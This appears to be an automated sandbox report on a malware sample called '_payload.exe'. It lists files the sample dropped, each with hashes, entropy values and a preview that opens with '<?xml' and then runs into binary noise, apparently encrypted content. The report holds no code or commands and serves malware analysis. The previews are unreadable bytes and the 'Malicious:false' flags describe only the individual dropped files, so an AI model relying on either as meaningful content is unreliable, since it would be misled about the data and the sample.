                                                                                                Size (bytes):1693
                                                                                                Entropy (8bit):7.885079849008437
                                                                                                Encrypted:false
                                                                                                SSDEEP:48:DHWFRI9P1u7N0wSzEsgwbWjVmlsPo9qI3+hATa6XLD:C3I9P1u7NDSz79WjVmlsPkqI34ATae
                                                                                                MD5:5636927C3E0E9722BE5CB69FD5EC8D58
                                                                                                SHA1:9C94E1CF1A8AB8F98F722FFEAB4ACA52BEDA8679
                                                                                                SHA-256:109F0AFFB487908AD6332032326DC053058A2D48C8BAA0C5348B0323161EA58C
                                                                                                SHA-512:B4AF472D2F7BFBD0AEFB1393029C0F49749884003344EED350C23B32F4BF51B6F63122330FDA3BD5F9A26AF05CD65D51FEB64A0C57C3B1BC222BE55DEC25B2D1
                                                                                                Malicious:false
                                                                                                Preview:<?xml.E..f.....;0m...yM..`....{v#.].s?.d..<.m>.gD...R..C.s..._...ymIS.....#....h.Ur..[r...O...o.x..K"...h5.RN...i.$...)...Y...o..E.jy.(Qq.#.p.P...R.n....}{.YX....u.\7K.9.....G_...58m.B..L...C.l \.g...F...JZ$+..lc.......J.....[ v.G.V..e.......E*8m..{....,i.st..2.e<...>.TO..z....:IWSS=.[f^...../e.!......r.k.R...M'......X.UM...H..l.....(....M.O#..<>.Q....p...xfvp..v...q...Q.......6...ZFF.{........V3.$. H..u..9E..]>(D9X..,..b!O..$M...'......e.hX..aJ..>..6Ek%k>...Vc..o...`.......%..... .|...G..4.{&!%.N..j....Q.v..<.I..ky.h.ly........T.....,...$.'V/!w.&Q...q*_...a\.JfU.'1...|kg."0...V..........0n/F.q8.T.f..$..L`v'..M......2..4.a.....8..Lq.z9O....5z.....4.ln{..I....g".8.:k..:(..N....@Qh....X.....3H%.9.."QwxK.G...(..@s]..g.b.(....^....VR.A..C...[>.. Y.....$i..pLH4.Z.i.eo.Y..d.....;Z.(aR..w.`.Lp.(o......[[se~...4....~..5.^.M....*~.......i.@y..bJj....g.........`<....J.B.%.hN..u..aD %?C.hr*....i.b...........8@.j..L.J~..v.lj....`CY.p....]@I".E...I.n.E........
                                                                                                Process:C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):1730
                                                                                                Entropy (8bit):7.881601863521999
                                                                                                Encrypted:false
                                                                                                SSDEEP:48:2HQHOGuX/eAv0dZ5D3hg+4ojdWy5s17DICKBYqwWrHJXO9x4OLD:DHOj/IdZ53hVbWy5s170CK7H0U2
                                                                                                MD5:E8CF86D9466900838F3A092500B1C71A
                                                                                                SHA1:D5180B932821DD52B7DC1B93465CB3670AF698A3
                                                                                                SHA-256:2C6B79E79C89BA38AFA83C4483C92AD69B50FC3FA1DF9A9E2D4410A58119E730
                                                                                                SHA-512:2DC97ACF6ABE4A363331FA14A905C2E9ABDBEA8B222A2980D5DDCC415617E69514C6950A3C488FB62C97D35DA31A6C8A964D57A9A28EF502EB1B2F61E0C116AC
                                                                                                Malicious:false
                                                                                                Preview:<?xml.[.(..?&....% .i.7.1..<...2I..~.y....@....~.[hz....g..V..i..'f..G5O.v.t~.)......3.9........+..:..T..H.....:.^..E+{......B7.J.{.L._.. \.Z..a..}k......3..H9CB o:L.{...x.S.n.'...._D...0.I"8...-...q!(....2.V...}#.\..P.i..A..w-}^.dWg..a.[.._:...d&......c.?.@....+....%.5.....o^|:V....Gz..w..d.?.....bmT.C*[..W.;..-..H.".....!.i.hd.:....d.@Z-Ku.(..6zhM.p9.....I....a8.j"....M..]?.K.r;]......<.oA.....(....0q..2j.B....2..H6.D6....)n...X....;.*..]...t.u.`...W..~S...o...m..#...B;....c.:...^.lb.y...$3.q.AU. .Y..M4....=.s...0F/.<.1..9M.'.....O....4.O .j".r./f.b)...T.P...G......nS....62..7.i.Y...AR.....}...p.R...!...nP....&...@.-..a.(@.a6..c.=<..k..hw...K...S.....}.4.p.3..........}....>....y...#.p....t.../@L..M%........9B.q..........}Y............y......SjL.......2B....<.`.../...%a...Y.'.....r......xmI.....&.j..K..2p...._s....W..~.......r......_Sy<..@.D[...7M...T...Uj@.f...#9....k.LbT.%.}I.@....W]..6...%....A.Ge"..[.8..-...[.q...k.....,v.
                                                                                                Process:C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):1711
                                                                                                Entropy (8bit):7.889381935535509
                                                                                                Encrypted:false
                                                                                                SSDEEP:48:ALtyT5HCAdUr9FNZOPa7gOIvQLOOgNMqtEPALD:A0ljuBHZ+6sQOBtE8
                                                                                                MD5:68358FD3524992632B041E7260ED5C04
                                                                                                SHA1:E626C071AA752D69772B0B0BC12E12857ED58921
                                                                                                SHA-256:F6905FD6700092DD59E744FCEB1BCD212AAA81226EB822834766FD3464692290
                                                                                                SHA-512:B8AB45A382D42CE5A45DF877D1A1AB7DB459C9C5DB0CFE98A4612D7E464DB626D4919EBA55540FB0BD72FA28E8F6A434603691D813D8613D8B9E88DE462A0D57
                                                                                                Malicious:false
                                                                                                Preview:<?xml}._.......e.m..F...A.k..lH...]%..)jRSq..ZO..].q.x..5.(...@..>.v...`s..:.^.).4.v.7...+.p2l..)......J.....2.J....5..n;..w...N..Fgs.*.....X(.|Cc....x.-.$n..w.T ....;...C7........_M1....(.z.U..Dv..j}..U.bQ...~...u..P.i..T.(+d........V.".B....-X...E?.....-;W $.G..F!..;.x....5.Q[{\.Y>..k.?.....e:....>..=.x|.2...E..3}.gU....VH>...,...4.}..(.XD..4.GL../.l.....$vx..z.V..Q....L'......k.....}.JS..X}..4..DM*.D.Z.u....GN}.T.#O.[.~.t..o..3..n8.._.....U,.......z.,..%...+.5.....hy..1>6.\o.j.O=Cm)..v....M6...:.$_.<.|.\:A.;...h..aL..3.r()-.......E.'.J...IJ.....y.\.")KM6w.I.T.t....\UD..k..4.J..A.....h_.o^+]...{..m_.aa.....[....8...e...(....Y........z...._[.I....9..F..4-*......\.U.Hv...{7$...7u........Rl.?...5F..b........+.p.......*.P.ai.......Kw.u@a.....m@.....N...]...^.D. ....][..?r+}rMz. ..i.S.I.>..P....<~..I..@..x..g|\...q.T[YO=...)8......E.Vv.W.....7...h.s....W..yx...E.Y.p*6a.<V..6fa.&'T.#.F`.#`.....Ec.... .W."'.Q.^...<........(VI..O!...N...:m.$7.N$.R
                                                                                                Process:C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):1748
                                                                                                Entropy (8bit):7.869600233082074
                                                                                                Encrypted:false
                                                                                                SSDEEP:48:d7hRySQbs3ed+iQatlvmTg9ldrNRY2NLD:d7vQbsamatlvmTadQ2Z
                                                                                                MD5:B3EABE0AE1D5C944604EACD060A59467
                                                                                                SHA1:3E97DC5E2A99B8E292F8CD9937752A147B7C99DF
                                                                                                SHA-256:51AEA5D8A9D78D45292BFA54C1E697AF103F3BAA555BA79233233D9A5B72A7B4
                                                                                                SHA-512:C864BE218F6E741A5CB1BE6702B0A18ADC5C7EAAC6E6B3C9ACF54B8EC7501D4BF0A8D327E7638AC64CA19B05D1A481A90529AA586A82D2E0A2233A75F13D6DD6
                                                                                                Malicious:false
                                                                                                Preview:<?xml./....5......*.X.3~...$..M?......V&..A.....q*.......Va...6...'51..:..&H...q.-....z.oU..Ew2m.RZ.....GP.T......(....8P...A...Dx...Fg......2....5....~.)...6..M....z.....E....`.[..o....d..\Q..|E...h..i.w-g.}.!>m.."4....b...,. n...".=).f..1.@.>..>g6.......z.{...Z:>K;]./..GW./l..e.%.$......4.........V.\.w..a.....n.).*.7B.Fv/o.5:...~.lP...S3.i?....:.v...1o..Meb.=...QEY;Zu.px...d.Hj......3......].,.K.s..K...n...1D....#.*..5...AO.I.GM.......B....Z[..h...h.F........L.DP.......l.S.....7.TL.H(w?......"(.....t?qb.j.je.Z.]$..i......b._m0..j>..i..i.}U.lu.h.....(1Y...)..H...........t.w..^j.'m..S.".Sq.C.Wb?n,eM....f6.7g4.{.....t.z...@..b/.1O...`....&.1X:.s.3R.Sg9I.Gh..........G..P(.....R..G..f.tkad......+.......G<.....~.b5...0..n..@..x.}h..eR..Ui..b;w.....w.].y..q1.6...I(....a.R.h...d+...<2....O(.E..9...g.7/....Q.......B.....t2...r._)!......^...U(../.2.S ..).......Dq..R..<.'m....?...].`}.o.Z=..w...0>;0.,..9.5.$mu........g....:.....O..6R...2
                                                                                                Process:C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):1733
                                                                                                Entropy (8bit):7.883070297008929
                                                                                                Encrypted:false
                                                                                                SSDEEP:48:w19DGmZz0ZLFfpQv4050YVRLJbjYiwm084qb/wQw4MEwLD:wrDGmFFv4wDJoiwmYqLwKk
                                                                                                MD5:3BA1759DA73C071FEE2114EA78A16878
                                                                                                SHA1:94E82674265324B9AEB5A66555BC382527150C90
                                                                                                SHA-256:7E16BCC1752C1ED7FDBF00794A2C8F8DBE6024DAD686399212FEC354064A48ED
                                                                                                SHA-512:F35B3BE57440E0F98A26D93B57CBEE1E4C9F5CEC1FA828B67403C20111F41D43D1E46695FD6CB340E2587F8F4AA3A75BB689A55FF0CB5A44DD56BB39F959C31F
                                                                                                Malicious:false
                                                                                                Preview:<?xml.;...$..gP.G...5......0.?. 2.Z..V.....M._.ke~..E...q.k.#...iy..... .9.....mF`..$..F,9..>.?....W...v...V.....5..8.[[.....&. ..k.A.R..s...G.@V......V.m.~l.2.'i.P.#.@..7I..H`......4......!...6.G.....5H&..e-.Q.g..A...=O+Y......$.o.......|....[......K..G(y..z...qu......].E[.......n..y....\..4....r...(..ZL.. ..;..8..X...U..j.J.G..dQ..}...x...../.</..0....m.....f....x......j.....h.R-..}w.}..fW....t..0...#....LG#=..~|Z....."..[ns..x.C..[.....5!..K.g."..!:I<..d.e...T.......a:..y...tR..c. .^....H`]....o'..T...e.~..Xir.V.R..t&..>......,...$.........^.R........I....=q..X..]y...#.%u..LD..........6Z..C[..E..<j..Q.ZZ$.A@..]...AU..C.)..K'-Z......-.E.+..(..Q.?...M.j.o...s.G....W]..0..Qp.......R...exd<.-.l.^]t....|N9L?..>>Qa..a3...G$....ds...c.Lxh......|...mP../v.q...%P..~Z.xi...B`.....P.U...Q..O.4J.V..0.>L..H?.E.....V|.@Ok.hW.....h..L,..4..^K.m..h...x~.o.f..... .....?...#.../p.k6.m.L..K..B0.*.o..6..Av I....@.......(c......fqU..........z[..?y..v.A..}.....
                                                                                                Process:C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):1770
                                                                                                Entropy (8bit):7.880340370487527
                                                                                                Encrypted:false
                                                                                                SSDEEP:48:FfUwE0/7LhSNGQq+xx9Fk93/kShtTeYO6Bi/DzNxPk2q3jImLD:Z0WhSZRW93/kSPO6B2PNpm3Eu
                                                                                                MD5:80B732C8827178E652CF9B6511D39FF8
                                                                                                SHA1:54DE653F3C50818EBF672BA336915090A3261986
                                                                                                SHA-256:E3DFD9EC2E68F53AAF9C5618769CC3186C3A760298015CDC1F373EB459E7B347
                                                                                                SHA-512:91EA02272140D90738B97B8D495F6A34D222F3814244D9EE7453FAD940F683FF4E518A4D4A0D6D10781681879194EC15BFC559D6335BB5E7F2FC7790368329E0
                                                                                                Malicious:false
                                                                                                Preview:<?xml..}..i#:.Mk.%;....Tj..J.>.....S}..o....jc....C..[....{.<.k..~|..!..zi..&0~......H...b.....:.../,.....4.k......`.X...%..@m.....o..-.W....]0?.cp+...^..g......^W..._..&%s{.'..;.Qkz\....C.?........6......^S....HF...L....S8...SLg..x..A.QI9.d...sW......"..IM.._..G.Z....]....*$<.*B..jo.#....w..*..Aj%...%....O...l{b.e`I.O.g...|.h4sH..r&...un...r0y.....d...@.lF...Lf.a..kz.T..3.....l:c....\..?.:i?..u..[B%...._.+CXH..5.y;.....m...,.j.3r..O5..N......T......W(.....c.s7.vyy..E'.r......\.'|..j.d._.y...]...?\.W.].AX..z....:.N.......#.7.........s..2..m.1..._.Wm.Mx...WV.O.J..`/..&....h..&hH..N....K\;..kp.5...J....s...vW...Jgl.!j.!%..C$.~.*G.w..b.?........B..sE.e'..t..r:,?.j<..2.?...l.~.V|....v[r.\Uy.[..$Q.[.fcA<.,.........{Z.9e....R.!:........._....6L.~{...X2gg..V>.jNu..DH...a..,...?R...L.Ft..8L."/.B.............0x....I60.V.BQ....n.m.....=G.....eU....HC..a...B.........;.v2@..7.^.k...,AZ4.)....}......^..i.u^.?.).4vY..l)..%ti..g4.4.o..^d.'.?.A(l}.kS..a.}
                                                                                                Process:C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):1715
                                                                                                Entropy (8bit):7.89357910606788
                                                                                                Encrypted:false
                                                                                                SSDEEP:48:RuonW4VmAGz1fnUaPLqInBqH/YbUSlXrQhQ296NlLD:wjvnZPLqInBFbUSgC
                                                                                                MD5:E1A25D5E26F6D39B963A3BBAD231922F
                                                                                                SHA1:8ED8349EE9454B3B946AA51AAB0B4591578819C5
                                                                                                SHA-256:BE1055CF7F5108BD30DE918C5694F9E404324E2F2355FD1C8B39C51373744F53
                                                                                                SHA-512:FE95F539CF282A703B2FA5B0CA1696979445557B7F788662FF26A3D059E69E2CAFC355F3EF29D6B95186F38A52A15AD6FC0C49119ED3B89CB839A564D2E3673D
                                                                                                Malicious:false
                                                                                                Preview:<?xml6.....2[@3.H........!C.o..r..N...N....%I$...Y...../.g..2u.B...In..<....B.'.9..:.D..x.....\.... /.)..[....T...:E.......:...x.s*.."........\.SK..-)L..b.......Aw.fK...t,YJ.A.,....+Y=..]k+liT.WDQ<H....."..".=.".,n.b..m..@.0..4}..5.e....i...........(..;..W.C.u...j>w..U2........y.G(].....*J/.F.h....l..b/....Ax....G(L...&..8..E]..Wq'".H..._Je.W)...22y.He..Yp....Aw....e.5..YB*cl..Jn[^[.?.v..O46z<|.g.J>[.~._....Q....=9"...y1.rM... ..C{...=j....K{.F:..9S...S..x#....#.).S.EW.'..J.%.o..:..e.F.1.*19...;YB.(...(I*k...d6ebH....!%.,d.n...}g..,.dW`$Yf+...,.~+.i. ..`.NQt.+.}f...j.#F.7..M.@bp...,T\..5O<CS.N_nS..]....?x.U..z....K.h..(...iz......v."hQd.S...1.N37.7..C...+f...x.p..^..g.s.G..m.x..w.(9...w]:.y........j..-..m=!R.|?P.Q..M.........S.=.Go..9..5..H%`..%.H...\.q.|.Q.{..s.2......4..0#...0.e..h.o8.(kM/.hI.....&A..X>gl7....i.U......O..y.z..qx.H.D.XE.8..\z...3....]Ti..R.A."...*..=V...C.C.RG./.,d.$~..-D{f..z...2.....gqW.P......!.1..#s]Mws.q8...
                                                                                                Process:C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):1752
                                                                                                Entropy (8bit):7.86920890809401
                                                                                                Encrypted:false
                                                                                                SSDEEP:48:3t70ibyo64IzfmI6eQHjyNtEN1Q7xvtz0gPFCLD:3tQibW4xIdP2N1Q7xVYgdC
                                                                                                MD5:176AC04F5B6F7766DBD7B4F260960609
                                                                                                SHA1:1431B430D0B1BBF27C1A42B6E2FA719B5FB25436
                                                                                                SHA-256:E467973570F1EA373AB4E8DF175DF2556C9082A62671E0E444BA103B35E90913
                                                                                                SHA-512:A996A9CC16119A24FC9F7F73654C4C56B2AEAC84793D9F470D1BC5410ADAA124964D97E59649DDFF23871BA78AA89FD2EA8BDED64C49FCFAD6A99CE72C98E6BC
                                                                                                Malicious:false
                                                                                                Preview:<?xml._rD._u[.#........F....`....;.e.=..h~M..:.C..L_.5Q..Y|.W.w.....f.j.hH..`>a...........2c..F(.+.P=.:i....%4!..P..E...`h.....:...p.Q.A.+.T..y7.,...c..P.M.1.......)/-h <.`....,.Z...9....l&..V.....akg. ......(/.[.(.pH...1...6]..81.....x....{.c*n....YMo.h........>.[AL*W{DI.@..hQ/.8T..Dv.D...P.g...H.Exc$.&....N~Z.Q..3X*...,E.H...9.|n.+......Ez.NE#..9..'.dT4..z..Oja.n.G.3g.D..`C..N1....a.=..<.,eo2.Q)Y.:.`J..#.,N.s@.J.iMSQ.2......>?.H.7gk......S1...7.i929..y...f...).D.hlwY].;.*BL..%r.xp6X..a..t.F.|....=..Y....s..5..3..@.z.......0...B..0....p..8z.....jQ*....N.hs.......P.S@i.Q..N..?.HV..Is.Ie.....n.......IyW..RrQ"..69Gi:h.....>...KX..;... L?Y.....6..3..B..(.L=.S...`.j...32'....`4....=b...1P.31....W .^if..~ .,..)].T:.-!G.....%}do.~..B.].1.).<..d.;'....s.......).....L^K.....LW..h.)......a...b!......?c)..U?.#....0.9CU...=...+.o.4;.t..5b...bY..6..9....h..{Y&....,.77.I.>;q.R.E.i$Yr..X/.']0..{..i..../..C#v...p4Z....xM.U.............&..:.M
                                                                                                Process:C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):1738
                                                                                                Entropy (8bit):7.887623411407501
                                                                                                Encrypted:false
                                                                                                SSDEEP:48:JMGvESOFHeotqY56eKuCWjNGe1QLK0CV1LD:L89HWg6eKudjtQ5C7
                                                                                                MD5:99B9612E928724778396BDDAA8E7CA6D
                                                                                                SHA1:A4926F6941B9143E172D874E0999F5BC104E4B42
                                                                                                SHA-256:6A7E22FB9E3723246FB35077EB518BC9609267BCEF7104820DFE0BC59F189E4C
                                                                                                SHA-512:6FCCEDC5AC0D86B2B488FE92722B548E976D0929959D5AD5684351B525D858083CC465C3B09FA76016B494235C5D629AC3607EDA5D8868D7C547F28594F78607
                                                                                                Malicious:false
                                                                                                Preview:<?xmlf. v.yJ.._a.f......9...........R..?ZkNxxU...?.1.m]..4.....|......L.AY.{.....#S.....+"f...B.E..M.P.{1....B.!r-.T...n7..]@.Q..xH.:.K ....d&.Q"I.grd7...+.%.w..R...O.Fe.i....... .......='....*..k..D]..)r....S.....~.)..g.......T...I.8...6s.(..`.....2.B{..L7.!9.{..W..7.d.a.V0..<Q.~.u{%..+.K>x.....j.[%..t............$......}.q....,.q..^....S...].5...79..e..d.7/.......Y.B.D.:..a.,.k....xn.c(..X.4..&p..tA..U.ej.(b..>}...4....q.7..*q;..46.hS.'..4...I..Y.<.`..._v..j*Vhgs.V..l.*...xs....z.{.-..N......2............];:~...g.".m.....}.a.V.....G..f-.!C).r.!Y...fj...q.B..t.y..d&wj....G....~.PkP.q....T........%..."...."L..K.ax..UM.V_k.......:.!p.n-.....e....d.P[....*.o......W.U......*+.Z.`...$.."...a...,.@....0.2... ..9......._...!.!!I..m2........."Jo~..AU..u#.`.M...8.R..0o.h.j.4.#.:.4...2$.j.TMh..w.....B.I\...X\.....8...s.....a..'.L.|........}N...o.+.. 0h...)#]...Sqz....7C....z@.`.........k|Rp...+..<..j{..m5.F.F..=.B...Q..!...+...'..y.{.2.&:......W.
                                                                                                Process:C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):1775
                                                                                                Entropy (8bit):7.893888830601302
                                                                                                Encrypted:false
                                                                                                SSDEEP:48:hdFXvZm+lxaVI+8Klpv3x+D7k3Hi4QAP6LD:hdF8+lo2ZKlNB+DeiZWa
                                                                                                MD5:1A9802D67AE0DE0838A40F418E9CD43C
                                                                                                SHA1:D244FFB9BFC5EF8C8BB199BFB6AA2DB16706F779
                                                                                                SHA-256:249B9FD44C6A8C13DDE04E5E886E26A85D17F738859110159758E7BB3C162780
                                                                                                SHA-512:74E8404C700B3AF0F0FA25AF60BB0D8078D23BBB193EB0DFE44FEB4D48BC4E5734C9158726BEF442A8422A3EC6F5E0F85D2A4FB60F261CFD8FFFCDB0AECD6B02
                                                                                                Malicious:false
                                                                                                Preview:<?xml...Dg.K.......f.\10%.v ..=.{$....g...q.. ......d.8..!..|#...K..Q1.>`....mP....wz.i.|..w.%ku'.U...T....r..}..]|.HX..4..Zs~..F:.~mV......Vv.~...W..\<r..9.....$E..."M.o...RL..M........q.(.O.y:.iu...:......YF.!.R..L.A8e.O3.C^u...n.-..E......t.k...3...F.....1b..M.....V....V U...........g....H.......|.....z..g.5..=J.0a.\.e`Y..,........}.r....I.<{..Il?....Q..O..g......M....S.AF>..4.d..aix.%........z...AhCD..L......T.}+.%.k.%78..0.....E..|+..H X.....u.. &]..hM7.R..|....6ob...;..?...cLH..l.Fe.9.c...p'..E._v......QV.Hw+-.-s3zW..(...^..V.~]l.w!.8.E[...`.J.*>K'...?Q.5,.[.^k..jV..YN.P..U..VU.`23k....5......84.....7.~>........7./._..v.e..o..T..U.y.,.-9.a..4..K./.B(;...@8.%L..5.!fH...|-G.Yd...3......4KD....nj.....$..5.t.p4{.'......*T..7.&6..f../.a._....:2!...a*..[./H.V.goap.Y#.yC.L....!.fE:r.y.wI..R........}.N&T.X..)p....q.&.6.P.LO@..n....H.{k.."?GD9._Z.v....}.eF.a).....~j.T..Qc.m%..x..6.|.9.G!..,;F..B...*w.,p.9.x....X._8H....2 +L#..F.g.i.xd7.
                                                                                                Process:C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):1723
                                                                                                Entropy (8bit):7.8937669477532735
                                                                                                Encrypted:false
                                                                                                SSDEEP:48:afsuZmUFgbfU5qJOGaUt8Vgli/gemo05u8OLD:afjgbfU5qJwsrc05P2
                                                                                                MD5:4ACDE77AD632B835846E4CA01AE78965
                                                                                                SHA1:7518EA77467FE48F10F47BCE8F502D796C14AB03
                                                                                                SHA-256:5B17E2C43764C937421E9AB8E6F0AA21A6E3A15C94474E69A9D99002579CCF79
                                                                                                SHA-512:4AC5A8824E5B4753E9F569685523DFFDD0EF6F806D2B639C2C27F919E06CBA0F45AB1F7860A71A8C8870948344F70EF6AFBE821D2D947301FC52955869082114
                                                                                                Malicious:false
                                                                                                Preview:<?xml.YFg..Lz...^K.a..Q..e`..yC'.z.......U.......w...>n9.....K..>.T.'.-a..=E.h1..B.m..y.F..d..|........$.i.T..'..s<M6....Y..y.......{#....."0.....Q.e.m. ......5.q......k)oc.......9YU...E2.<..._.Rv.t.6....t....../..]/......CU....t..q..j4wq.g...f...*H.f.&.y...5k.Q<:..K./.-.h=a..,y...]..;;...%..+B.........x...r...5.aA.I...P...{Xq2[(E.(@...D..c..U.[;.gs.q.......?..:1..l..=../..@..Z...*.s..l........DYKL.....6$Bl&........-.%.(.{...j[....G$....lG]....1......_.J.z........Oj....M.JIj..N.3u(..FoYD..#=%..d|."..._.=xa.\..9.....|.t....-t...Q.{t.2p.....^-.N...-.R?.0&....>.....3.L).n..C....}kbR.x5.......I.w.|6....G.:..P)x.)@.+W.<G...l....O..2..u....T.wQ*.....+r....U..&z;$..XFa...zc.wS.h.<.t......?=.y.q.SZ.Od.-..X!.W......vP..,'.B...p@...r.8.....W.d......]..{.`..'?..X.5...r.In^W......P...M.X7uT..y....g.<D...}LV./G..Q.....O.7.e.2'.U.1.1".k....{..?..Ra.z..F......2~...(8(.C/...$..|I]..<.bd....j..t...I.X.H6poxQ`.N..A..W.d..".t9..[UX....-I[......C.....m...J.@
                                                                                                Process:C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):1760
                                                                                                Entropy (8bit):7.87491892123864
                                                                                                Encrypted:false
                                                                                                SSDEEP:48:X+oi10lz47EfRS6GFlYANlUvhBwTGOdLD:X+OlqT6GFCANlUvoiOJ
                                                                                                MD5:CEBCD3DBDE9821E721E83B81E6778996
                                                                                                SHA1:6725D5CF2DE01C6AC504AAE2BA8FEC15BF03BD1E
                                                                                                SHA-256:15A7102DB9C94180F6A3823F6A68E1709FE1624305BCA5075D982C6F5C5D598A
                                                                                                SHA-512:20770539E0C2533A925478D6D27E5438CE3FDD84121A1A0D54E2845057E86A42D07DEA26AA5B9A457CB8FBF5A4CE9A3EDEF3F81D555C444F61303CB0E9EEB5E2
                                                                                                Malicious:false
                                                                                                Preview:<?xmlU0.&..8H.]...I.:...Nf.]...72&...o[ .E.URCM.\.$3`.X.~..<.........=...p....S....Y.L.c..l.]e.].l(.....=D......VZ.f.F.(0.9......S(7.).Q<.#.%...G....R.0e.l...=Y@GC..i..4.=..Cd.5H....A....F..B.9;...".!.\W'.:y$V.......+yl...o...........F.Qc...Q6u?H}...KL.9."+.U..P.*S..w../cH....|d....B.......}.x>w..V.....Ycy......v..w......\....G...h.Q\j.9.C{.NP.../%..k..]..J..H...;....iw.m.@.W.m..[...M..-..,..nK.G.'e..\.>....~.....y%h...VF.g..).v.C.....5%.....^...M.lO.....G.q.N.j.qw..(..p....ob......B..0.G......a...d...74....6.&j.i.....@Wa..0.5.."kR.'u.Cp.....%&)M.....W...Z1..W..]...dj.......9Q{.........^..v.'.O.l..#.1@}.O......F.Y....`6..3..l.#...._.../*8j"2x.*..D.!].N.._.......vmrk......S.S......3.1E...n.f.Fm..5..BB....|./.@n..mN|.H.[Fg...8..V...<P..}.,.^^.a...nP.I.PD...%..".....ij.|..;;.0..*.L.mi3.....z.<._2..y.y*{c.v..Q.Y....9...39S..F........ .K?8(..S..._.s.6B......=.)}C|.N..#]|..F..!..b.....cM...;2.}.h..2P.)ZH4...L.g.z?P..n.$.Q..R.....oYa.K_Rn...
                                                                                                Process:C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):1699
                                                                                                Entropy (8bit):7.896584703437346
                                                                                                Encrypted:false
                                                                                                SSDEEP:48:l8SdRyPyxGU8+4hxGblU1v+E7+DahNJBNvchLD:l8+yPyF8+4hAxUZ3waJBNA
                                                                                                MD5:0A289F44CC28767D06F3138CB73A59AF
                                                                                                SHA1:E39EA9BA1FBB871905C9D8D2152E2EA59F35C68E
                                                                                                SHA-256:B716F830FED6073D19A62ED30479C05504CC142EDCBFDE191AACE66493D1BB95
                                                                                                SHA-512:2B23F053DA232E264A6A7FE89445A0926AE8FB005876FD71D766B1437CFB04D0E00693D3CFFB37BD9B8041C8864665CD024FF63BD1E67F1DDBBFCCAC5B6221B4
                                                                                                Malicious:false
                                                                                                Preview:<?xml.c.@.}....>`n.......@.p.4...t,Q=....!H.T....v.a..&..Je..Q.?y..S.!.1b.%{.m 6".N-....,Y...O....43.=.,..`.....E.x..(-B.......n....P..`.L\?(LL..~S4..P.<fKSPvvY.,.T....._.....8AB..b .......h...t.....!.......ln..#.d.....9........c...>....E..-.O\......%..55.N.....5S.v...9.YQF............x6...Y.d......w.]l....@_.Pm{....:.F|.Y..;..zg.j..WcI.xJ.:wS}.aO.....].?;.}..m:%,?./.^.>...6VfMt...^...f...!..N..{..).8.........ut$5.y.R.;C.8..../[F..$..j..e".........&K<i...........y.:UZL{.\....>...F.*.,4K..........y...;.sJ....?......lo......l..11....wl5..Z......q....K..h..R......,V..}..I..o.....A.. ........?..-O.J..9:.....k...M...-....4.....H..B...z..^.E.._.W......."X..V.".9.D...X&h>.........A.......3.-..;..\.:. .w..g.(..P.w.T..1...-..I..R.. 3{2.....].._...w...7....#.Y6.$d..|..!.L.g..>(....{......:.+..D.m.".0.m....q:0..."....).....~~n...S`.~.*.S...p......?../A..;.].R)..w..47wK..^...]..K......Y..lF.D..w......k.(.......K..........j..*..CI.a.>.....
                                                                                                Process:C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):1736
                                                                                                Entropy (8bit):7.878208851453723
                                                                                                Encrypted:false
                                                                                                SSDEEP:24:4SggG9Aaris5hO4STIwWAdlGw8Ptzkv/4DIHtIYovlQkCbAK+Iq0NYmFJRejMPHo:8T2s5IQlwktza/ZHt6rArNYm/RejMkLD
                                                                                                MD5:DA8589169042ED87E32F22BED9D9117C
                                                                                                SHA1:7AA0E7982012F752211BF65BDC8CC8A89C4FBAA1
                                                                                                SHA-256:CBFC693DE06DD506C80C5A75F5A7ECCB707677E3F6018F608ADC9AE76359B2C1
                                                                                                SHA-512:7672E73D1FBA1231CEAC17C8F20AF487C2159F86198005026181B07565EA6CF7BF7D2E743CB512956A4806AD9C1E69DCCD499F9CC36A5A3716D633B56E002BC8
                                                                                                Malicious:false
